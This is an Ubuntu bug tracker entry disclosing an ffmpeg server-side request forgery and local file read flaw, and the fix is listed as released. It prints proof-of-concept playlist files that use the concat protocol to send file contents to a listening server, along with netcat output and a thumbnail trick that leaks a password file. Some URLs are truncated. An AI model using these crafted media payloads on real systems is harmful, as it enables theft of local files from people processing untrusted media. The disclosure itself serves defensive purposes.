ffmpeg allows Server-Side Request Forgery attack
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
ffmpeg (Ubuntu) |
Fix Released
|
Medium
|
Unassigned | ||
Vivid |
Fix Released
|
Medium
|
Unassigned | ||
Wily |
Fix Released
|
Medium
|
Unassigned | ||
Xenial |
Fix Released
|
Medium
|
Unassigned |
Bug Description
There is a russian blog post about SSRF and local file read with ffmpeg:
http://
One of variants:
$ cat /tmp/test.m3u8
#EXTM3U
#EXT-X-
#EXTINF:,
http://
(Last line - http://
$ cat /tmp/test.avi
#EXTM3U
#EXT-X-
#EXTINF:10.0,
concat:
#EXT-X-ENDLIST
$ cat /tmp/test
qwerty
123456
Open test.avi with smplayer or even kde baloo:
$ nc -v -l 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
GET ?qwerty HTTP/1.1
User-Agent: Lavf/56.1.0
Accept: */*
Range: bytes=0-
Connection: close
Host: localhost:8080
Icy-MetaData: 1
Localhost and local test.m3u8 can be changed to remote server.
File extension does not matter.
There is another attack with tumbmails:
$ cat header.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
$ cat video.mp4
#EXTM3U
#EXT-X-
#EXTINF:10.0,
concat:http://
#EXT-X-ENDLIST
$ ffmpeg -i video.mp4 thumbnail.png
$ ffmpeg -i thumbnail.png out.y4m
$ cat out.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
# $FreeBSD: release/
,! 2013-10-12 06:08:18Z rpaulo $
#
root:*:0:0:Charlie &:/root:
toor:*:
Changed in ffmpeg (Ubuntu): | |
importance: | Undecided → Medium |
Changed in ffmpeg (Ubuntu Vivid): | |
status: | New → Confirmed |
Changed in ffmpeg (Ubuntu Wily): | |
status: | New → Confirmed |
Changed in ffmpeg (Ubuntu Vivid): | |
importance: | Undecided → Medium |
Changed in ffmpeg (Ubuntu Wily): | |
importance: | Undecided → Medium |
For read full file just switch from 'concat' to 'subfile' as I understood.